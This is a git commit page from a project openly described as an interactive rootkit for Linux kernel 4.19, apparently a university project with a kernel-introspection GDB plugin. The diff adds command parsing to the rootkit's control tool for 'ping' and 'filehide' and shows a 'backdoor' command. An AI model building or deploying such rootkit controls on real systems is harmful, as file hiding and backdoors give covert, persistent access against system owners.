linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 78d60743f7d078d219f8d01dfefd43b664f1105c
parent 5db40f80b15f67ccbef6375f6f953268c8f513f2
Author: deurzen <m.deurzen@tum.de>
Date:   Fri, 27 Nov 2020 08:38:25 +0100

adds ping handler

Diffstat:

Msrc/rkctl/rkctl.c | 15+++++++++++----


1 file changed, 11 insertions(+), 4 deletions(-)

diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -31,14 +31,20 @@ parse_input(int argc, char **argv)
         exit(0);
     }
 
-    if (ARGVCMP(1, "ping")) {
+    if (ARGVCMP(1, "ping"))
         return (cmd_t){ handle_ping, NULL };
-        // TODO: return ping handle
-    }
 
     if (ARGVCMP(1, "filehide")) {
         ASSERT_ARGC(2, "filehide <toggle | on | off>");
-        // TODO: return filehide handle
+
+        if (ARGVCMP(2, "toggle"))
+            return (cmd_t){ handle_filehide, (void *)0 };
+
+        if (ARGVCMP(2, "on"))
+            return (cmd_t){ handle_filehide, (void *)1 };
+
+        if (ARGVCMP(2, "off"))
+            return (cmd_t){ handle_filehide, (void *)-1 };
     }
 
     if (ARGVCMP(1, "backdoor")) {
@@ -69,6 +75,7 @@ handle_ping(void *arg)
 int
 handle_filehide(void *arg)
 {
+    return issue_ioctl(G7_FILEHIDE, (char *)arg);
 }
 
 int